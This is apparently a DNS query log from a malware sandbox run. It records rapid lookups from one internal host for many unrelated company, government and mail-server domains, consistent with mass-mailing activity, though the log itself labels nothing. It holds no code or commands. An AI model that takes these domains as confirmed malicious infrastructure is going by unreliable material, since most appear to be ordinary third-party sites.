                                                                                                                                                                              Sep 15, 2023 07:27:21.990855932 CEST192.168.2.38.8.8.80x9530Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.994544983 CEST192.168.2.38.8.8.80x15a2Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.995842934 CEST192.168.2.38.8.8.80x2087Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.996078968 CEST192.168.2.38.8.8.80x54e4Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.997148037 CEST192.168.2.38.8.8.80x5ed8Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.997638941 CEST192.168.2.38.8.8.80x3052Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.998781919 CEST192.168.2.38.8.8.80x538cStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.999383926 CEST192.168.2.38.8.8.80x92bfStandard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.000703096 CEST192.168.2.38.8.8.80xc98cStandard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.007455111 CEST192.168.2.38.8.8.80x274aStandard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.023880005 CEST192.168.2.38.8.8.80xe5a3Standard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.032732010 CEST192.168.2.38.8.8.80x4141Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.037496090 CEST192.168.2.38.8.8.80x4155Standard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.045638084 CEST192.168.2.38.8.8.80x6ea2Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.051209927 CEST192.168.2.38.8.8.80x4e62Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.061999083 CEST192.168.2.38.8.8.80xcb0cStandard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.070477962 CEST192.168.2.38.8.8.80xce0Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.071522951 CEST192.168.2.38.8.8.80x76adStandard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.080434084 CEST192.168.2.38.8.8.80xe8bcStandard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.097140074 CEST192.168.2.38.8.8.80x63dcStandard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.118473053 CEST192.168.2.38.8.8.80x1812Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.157644033 CEST192.168.2.38.8.8.80xecbdStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.169621944 CEST192.168.2.38.8.8.80x12fbStandard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.190613985 CEST192.168.2.38.8.8.80xdf34Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.201119900 CEST192.168.2.38.8.8.80xd7dfStandard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.203015089 CEST192.168.2.38.8.8.80xf18Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.207057953 CEST192.168.2.38.8.8.80x8e9eStandard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.211390018 CEST192.168.2.38.8.8.80x1465Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.214690924 CEST192.168.2.38.8.8.80xee1bStandard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.236809015 CEST192.168.2.38.8.8.80xf0b5Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.241096973 CEST192.168.2.38.8.8.80x5a6bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.248318911 CEST192.168.2.38.8.8.80x1005Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.262679100 CEST192.168.2.38.8.8.80xc45dStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.262849092 CEST192.168.2.38.8.8.80x69edStandard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.267796993 CEST192.168.2.38.8.8.80x92f9Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.335567951 CEST192.168.2.38.8.8.80x1c37Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.341413021 CEST192.168.2.38.8.8.80xc612Standard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.356491089 CEST192.168.2.38.8.8.80x30bbStandard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.356841087 CEST192.168.2.38.8.8.80x5bbfStandard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.384823084 CEST192.168.2.38.8.8.80x510eStandard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.454396009 CEST192.168.2.38.8.8.80x7977Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.460774899 CEST192.168.2.38.8.8.80x6791Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.463243008 CEST192.168.2.38.8.8.80xe99cStandard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.465007067 CEST192.168.2.38.8.8.80x41baStandard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.465528965 CEST192.168.2.38.8.8.80xf496Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.470350027 CEST192.168.2.38.8.8.80x9086Standard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.515302896 CEST192.168.2.38.8.8.80x2228Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.521125078 CEST192.168.2.38.8.8.80x6c4fStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.523758888 CEST192.168.2.38.8.8.80x2a6dStandard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.562374115 CEST192.168.2.38.8.8.80xf09fStandard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.722821951 CEST192.168.2.38.8.8.80x8732Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.762252092 CEST192.168.2.38.8.8.80xd3fdStandard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.812242985 CEST192.168.2.38.8.8.80xa517Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.821738958 CEST192.168.2.38.8.8.80xcb6aStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.902275085 CEST192.168.2.38.8.8.80x4f0cStandard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:22.937856913 CEST192.168.2.38.8.8.80x9f65Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.065483093 CEST192.168.2.38.8.8.80xa51aStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.072407007 CEST192.168.2.38.8.8.80xbfebStandard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.076267004 CEST192.168.2.38.8.8.80x4949Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.106522083 CEST192.168.2.38.8.8.80x14fStandard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.132462978 CEST192.168.2.38.8.8.80xa874Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.138524055 CEST192.168.2.38.8.8.80x9be7Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.139028072 CEST192.168.2.38.8.8.80xb3abStandard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.139064074 CEST192.168.2.38.8.8.80x7100Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.149792910 CEST192.168.2.38.8.8.80x40f1Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.204695940 CEST192.168.2.38.8.8.80x2548Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.220185995 CEST192.168.2.38.8.8.80xd792Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.221638918 CEST192.168.2.38.8.8.80x7ae2Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.239191055 CEST192.168.2.38.8.8.80x9f6cStandard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.244498014 CEST192.168.2.38.8.8.80xbc47Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.252700090 CEST192.168.2.38.8.8.80x5a6bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.263639927 CEST192.168.2.38.8.8.80x7cf9Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.277000904 CEST192.168.2.38.8.8.80xba7Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.315489054 CEST192.168.2.38.8.8.80xc936Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.338641882 CEST192.168.2.38.8.8.80xe099Standard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.353571892 CEST192.168.2.38.8.8.80x1c37Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.357691050 CEST192.168.2.38.8.8.80xe1d7Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.396722078 CEST192.168.2.38.8.8.80xeff5Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.416654110 CEST192.168.2.38.8.8.80x343bStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.436760902 CEST192.168.2.38.8.8.80x453dStandard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.460427999 CEST192.168.2.38.8.8.80x85b5Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.460942030 CEST192.168.2.38.8.8.80x58deStandard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.501914978 CEST192.168.2.38.8.8.80xbde0Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.539201021 CEST192.168.2.38.8.8.80x586cStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.539439917 CEST192.168.2.38.8.8.80x780aStandard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.557013988 CEST192.168.2.38.8.8.80xd50Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.584878922 CEST192.168.2.38.8.8.80xda41Standard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.584964991 CEST192.168.2.38.8.8.80x480cStandard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.590670109 CEST192.168.2.38.8.8.80x72acStandard query (0)www.clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.617039919 CEST192.168.2.38.8.8.80xb614Standard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.631072998 CEST192.168.2.38.8.8.80x7915Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.635907888 CEST192.168.2.38.8.8.80x555bStandard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.714472055 CEST192.168.2.38.8.8.80xc3bStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.800887108 CEST192.168.2.38.8.8.80xdcc6Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.816453934 CEST192.168.2.38.8.8.80xca62Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.846198082 CEST192.168.2.38.8.8.80xb0caStandard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.856915951 CEST192.168.2.38.8.8.80x4414Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.867126942 CEST192.168.2.38.8.8.80x9f0Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.906111956 CEST192.168.2.38.8.8.80x9edeStandard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.937416077 CEST192.168.2.38.8.8.80x4355Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.937973022 CEST192.168.2.38.8.8.80xaac9Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.939579964 CEST192.168.2.38.8.8.80x6edaStandard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:23.957247019 CEST192.168.2.38.8.8.80xea24Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.059081078 CEST192.168.2.38.8.8.80xf2c6Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.075840950 CEST192.168.2.38.8.8.80xc33dStandard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.160983086 CEST192.168.2.38.8.8.80x3cb6Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.186289072 CEST192.168.2.38.8.8.80x2c41Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.198214054 CEST192.168.2.38.8.8.80x5ff9Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.237468958 CEST192.168.2.38.8.8.80x20ceStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.256433010 CEST192.168.2.38.8.8.80x359fStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.271564007 CEST192.168.2.38.8.8.80x5a46Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.277096987 CEST192.168.2.38.8.8.80x8a62Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.355729103 CEST192.168.2.38.8.8.80x99a5Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.390945911 CEST192.168.2.38.8.8.80x5d74Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.438421011 CEST192.168.2.38.8.8.80xefc1Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.523282051 CEST192.168.2.38.8.8.80x3588Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.541327000 CEST192.168.2.38.8.8.80x4e2bStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.634090900 CEST192.168.2.38.8.8.80x5fa0Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.644469023 CEST192.168.2.38.8.8.80x113dStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.656883955 CEST192.168.2.38.8.8.80x8ac4Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.657565117 CEST192.168.2.38.8.8.80x5ef0Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.667941093 CEST192.168.2.38.8.8.80x1794Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.737359047 CEST192.168.2.38.8.8.80xe00bStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.741568089 CEST192.168.2.38.8.8.80x4b39Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.845129967 CEST192.168.2.38.8.8.80xda9Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.901046991 CEST192.168.2.38.8.8.80xb73aStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.953645945 CEST192.168.2.38.8.8.80xb583Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.957964897 CEST192.168.2.38.8.8.80x41dbStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.977032900 CEST192.168.2.38.8.8.80x1a81Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:24.981720924 CEST192.168.2.38.8.8.80x48bdStandard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.075268030 CEST192.168.2.3192.203.230.100xf1Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.078212023 CEST192.168.2.38.8.8.80x6466Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.156353951 CEST192.168.2.38.8.8.80xf0b8Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.157524109 CEST192.168.2.38.8.8.80xb3e1Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.167628050 CEST192.168.2.3198.32.64.120xa7Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.192485094 CEST192.168.2.38.8.8.80x6912Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.247157097 CEST192.168.2.38.8.8.80x754eStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.253988028 CEST192.168.2.3198.41.0.40x79Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.271770000 CEST192.168.2.38.8.8.80x5a6bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.317544937 CEST192.168.2.38.8.8.80x370bStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.349658966 CEST192.168.2.3202.12.27.330x2fStandard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.350891113 CEST192.168.2.38.8.8.80xb47fStandard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.353919029 CEST192.168.2.3198.32.64.120xe2Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.421983957 CEST192.168.2.38.8.8.80x749dStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.436486959 CEST192.168.2.38.8.8.80x875eStandard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.613821983 CEST192.168.2.3192.33.4.120x14Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.716722965 CEST192.168.2.38.8.8.80xc1ceStandard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.717611074 CEST192.168.2.38.8.8.80x8acStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.775733948 CEST192.168.2.38.8.8.80x9414Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.880419016 CEST192.168.2.38.8.8.80x7f0bStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:25.892731905 CEST192.168.2.38.8.8.80xbf78Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.104255915 CEST192.168.2.38.8.8.80x5548Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.233323097 CEST192.168.2.38.8.8.80x467eStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.273545027 CEST192.168.2.38.8.8.80x2c4eStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.286947012 CEST192.168.2.38.8.8.80x649Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.310295105 CEST192.168.2.38.8.8.80x706Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.324738979 CEST192.168.2.38.8.8.80xbbf6Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.375998020 CEST192.168.2.38.8.8.80x123Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.406864882 CEST192.168.2.38.8.8.80x15b3Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.425666094 CEST192.168.2.38.8.8.80xb290Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.430324078 CEST192.168.2.38.8.8.80x30d9Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.480650902 CEST192.168.2.38.8.8.80xd5bdStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.506954908 CEST192.168.2.38.8.8.80xf877Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.523154020 CEST192.168.2.38.8.8.80xa1e5Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.554620981 CEST192.168.2.38.8.8.80x178bStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.564682007 CEST192.168.2.38.8.8.80x8963Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.630824089 CEST192.168.2.38.8.8.80xcba1Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.638434887 CEST192.168.2.38.8.8.80x2d0bStandard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.669792891 CEST192.168.2.38.8.8.80x2a5dStandard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.731146097 CEST192.168.2.38.8.8.80x65ecStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.759943962 CEST192.168.2.38.8.8.80x85f5Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.770358086 CEST192.168.2.38.8.8.80xec39Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.776729107 CEST192.168.2.38.8.8.80x94faStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:26.975361109 CEST192.168.2.38.8.8.80x4642Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.055685043 CEST192.168.2.38.8.8.80x136aStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.083056927 CEST192.168.2.38.8.8.80x51fStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.109637976 CEST192.168.2.38.8.8.80xf364Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.150710106 CEST192.168.2.38.8.8.80xaa44Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.186892986 CEST192.168.2.38.8.8.80xfaa7Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.272872925 CEST192.168.2.38.8.8.80x2df1Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.311877966 CEST192.168.2.38.8.8.80xc8d7Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.316411972 CEST192.168.2.38.8.8.80x1293Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.370563030 CEST192.168.2.38.8.8.80x5ba4Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.441066027 CEST192.168.2.38.8.8.80xe5cfStandard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.484657049 CEST192.168.2.38.8.8.80x938cStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.539045095 CEST192.168.2.38.8.8.80xdcdcStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:27.560985088 CEST192.168.2.38.8.8.80xb02eStandard query (0)t-mould.comA (IP address)IN (0x0001)false
